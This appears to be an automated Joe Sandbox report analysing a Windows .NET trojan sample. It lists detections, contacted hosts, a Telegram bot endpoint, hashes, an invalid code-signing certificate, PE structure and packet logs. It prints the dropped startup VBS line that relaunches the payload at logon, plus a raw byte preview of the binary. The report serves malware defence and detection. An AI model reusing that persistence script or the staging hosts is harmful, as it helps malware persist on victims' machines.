                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Ref#103052.exe57%VirustotalBrowse
                  Ref#103052.exe58%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                  Ref#103052.exe100%AviraHEUR/AGEN.1323669
                  Ref#103052.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Wnuth.exe100%AviraHEUR/AGEN.1323669
                  C:\Users\user\AppData\Roaming\Wnuth.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Wnuth.exe58%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://oshi.at/STEq0%Avira URL Cloudsafe
                  https://oshi.at/STEqM0%Avira URL Cloudsafe
                  89.40.31.2320%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  oshi.at
                  		194.15.112.248
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://oshi.at/STEqfalse
                    • Avira URL Cloud: safe
                    		unknown
                    89.40.31.232true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netRef#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://oshi.at/STEqMRef#103052.exe, Wnuth.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://oshi.atRef#103052.exe, 00000000.00000002.2266018230.0000000002541000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netiRef#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJRef#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botRef#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#103052.exe, 00000000.00000002.2266018230.0000000002541000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      194.15.112.248
                                      		oshi.atUkraine
                                      		213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1586494
                                      Start date and time:2025-01-09 08:25:14 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 51s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Ref#103052.exe
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winEXE@4/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 93%
                                      • Number of executed functions: 349
                                      • Number of non-executed functions: 39
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Ref#103052.exe, PID 1240 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      08:26:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      194.15.112.2489876567899.bat.exeGet hashmaliciousLokibotBrowse
                                        Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                          Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                            Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                              Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                    Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                      uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                        W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          oshi.at9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                          • 194.15.112.248
                                                          Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.253.86.15
                                                          Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.253.86.15
                                                          Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                          • 5.253.86.15
                                                          Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 194.15.112.248
                                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.15.112.248
                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.15.112.248
                                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                          • 5.253.86.15

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                          • 194.15.112.248
                                                          Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 194.15.112.248
                                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.15.112.248
                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.15.112.248
                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                          • 194.15.112.248
                                                          uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                          • 194.15.112.248
                                                          W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                          • 194.15.112.248

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eNEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          http://topmarktingplace.com/4vfVEJ42616owhy1324yhmrkkdpck110EVYGTFUNAFUPGFT22589MFQQ17548D10Get hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          http://topmarktingplace.com/4KCrhO42616HeLs1324axlafysauc110UGQLALGLNEZCHJM22589XDWY17548d10Get hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 194.15.112.248
                                                          ZipThis.exeGet hashmaliciousUnknownBrowse
                                                          • 194.15.112.248
                                                          pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                          • 194.15.112.248
                                                          EZZGTmJj4O.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.15.112.248

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Ref#103052.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):84
                                                          Entropy (8bit):4.804411732478116
                                                          Encrypted:false
                                                          SSDEEP:3:FER/n0eFHHo0nacwREaKC59fAIn:FER/lFHIcNwiaZ59oI
                                                          MD5:5C36AA45FD76743D51E46D03BB4FF380
                                                          SHA1:A5D6C0AB1780B4460F8F73C17C7AFAA08CFD1FD2
                                                          SHA-256:FC74286A5E76A5BFDD353913FF8D51C016F4CDDFDCEADBCE78177D158C4C9A28
                                                          SHA-512:FE0BFB8ECB420B81E37186C86A2E2D7BDF273F72C5346BB2D39C8D3E0606E534340A58BD24043869084458D34A92D71D8EE0D9567AC433C54E0CFF153A01F2E2
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Wnuth.exe"""

                                                          C:\Users\user\AppData\Roaming\Wnuth.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Ref#103052.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):73848
                                                          Entropy (8bit):5.700208074482842
                                                          Encrypted:false
                                                          SSDEEP:1536:TI0F47ioMfqriq2XelxUKzgTL/iQ263s+/iJ/mH:haJAr/2/Y
                                                          MD5:BAC93B85BD7054A23583F29D19FE4206
                                                          SHA1:58E5D1D350F8ED03BF70A9D1C4295677B5F9EAE3
                                                          SHA-256:462E6B70A2EB82A0B3DAF58C079E6DF3A1360081059220E5832B8C0CFFA51B33
                                                          SHA-512:41402F83C44F31B7488370FC97430C681E2A1DCD00030603A54D010E9355A51D9E6C3C2378C170A325066C8043D02ED282DC9238ECC2CBCE52F6E14FC638C411
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|g.....................J......N.... ........@.. .......................`............`.....................................K........F..............x....@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................0.......H........g..8\...........................................................*...(....*..(....&*.s....%(....(.....o....o....o....*....(....*.s....%(.....o....u....r...po....o....*...(....*.0..=.......s...........(....(.....o....u....rM..p(..........o....o.....*.....(....*.0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.......*..(....@.%e..........Ft........'.\.........(....*.0..

                                                          C:\Users\user\AppData\Roaming\Wnuth.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Ref#103052.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):5.700208074482842
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Ref#103052.exe
                                                          File size:73'848 bytes
                                                          MD5:bac93b85bd7054a23583f29d19fe4206
                                                          SHA1:58e5d1d350f8ed03bf70a9d1c4295677b5f9eae3
                                                          SHA256:462e6b70a2eb82a0b3daf58c079e6df3a1360081059220e5832b8c0cffa51b33
                                                          SHA512:41402f83c44f31b7488370fc97430c681e2a1dcd00030603a54d010e9355a51d9e6c3c2378c170a325066c8043d02ed282dc9238ecc2cbce52f6e14fc638c411
                                                          SSDEEP:1536:TI0F47ioMfqriq2XelxUKzgTL/iQ263s+/iJ/mH:haJAr/2/Y
                                                          TLSH:547319026698C252D2545B3ED8E244704770FEA2AB97DA0F34FA3F297437F649A4731E
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|g.....................J......N.... ........@.. .......................`............`................................

                                                          File Icon

                                                          Icon Hash:23d8d8d4d4d85007

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x40c44e
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x677CDCF8 [Tue Jan 7 07:51:20 2025 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Authenticode Signature

                                                          Signature Valid:false
                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                          Signature Validation Error:The digital signature of the object did not verify
                                                          Error Number:-2146869232
                                                          Not Before, Not After
                                                          • 19/10/2023 11:33:01 19/10/2024 11:33:01
                                                          Subject Chain
                                                          • CN=Helpfeel Inc, OU=\u958b\u767a\u90e8, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                                                          Version:3
                                                          Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                                                          Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                                                          Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                                                          Serial:138A5335DB02BAFDC71DC47A

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc4000x4b.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x46dc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xf2000x2e78.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xa4540xa600b6a7b4db82fec023dfba350382edc8e4False0.5067771084337349data5.831882654064662IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xe0000x46dc0x480075b1bcac89a65b6fc51be0b17eed7686False0.06743706597222222data2.187267186961394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x140000xc0x2002be470437558e134270c32f689ac0765False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xe1300x4028Device independent bitmap graphic, 64 x 128 x 32, image size 00.029286410131514857
                                                          RT_GROUP_ICON0x121580x14data1.05
                                                          RT_VERSION0x1216c0x384data0.42
                                                          RT_MANIFEST0x124f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 9, 2025 08:26:16.246009111 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:16.246053934 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:16.246124983 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:16.261126041 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:16.261137009 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:17.385870934 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:17.385963917 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:17.877474070 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:17.877537012 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:17.877943993 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:17.926942110 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:18.408493042 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:18.455341101 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031001091 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031023979 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031061888 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031086922 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.031136036 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031156063 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.031279087 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031333923 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.031341076 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.031382084 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.218935013 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.219012022 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.219295979 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.219352007 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.219518900 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.219568014 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.220182896 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.220233917 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.220359087 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.220407963 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.220416069 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.220457077 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.233335018 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.233402967 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.305640936 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.305706978 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.405997992 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.406058073 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.406363964 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.406410933 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.406567097 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.406605005 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.407234907 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.407279015 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.407713890 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.407759905 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.407891035 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.407941103 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.408521891 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:19.408571959 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:19.408693075 CET44349704194.15.112.248192.168.2.7
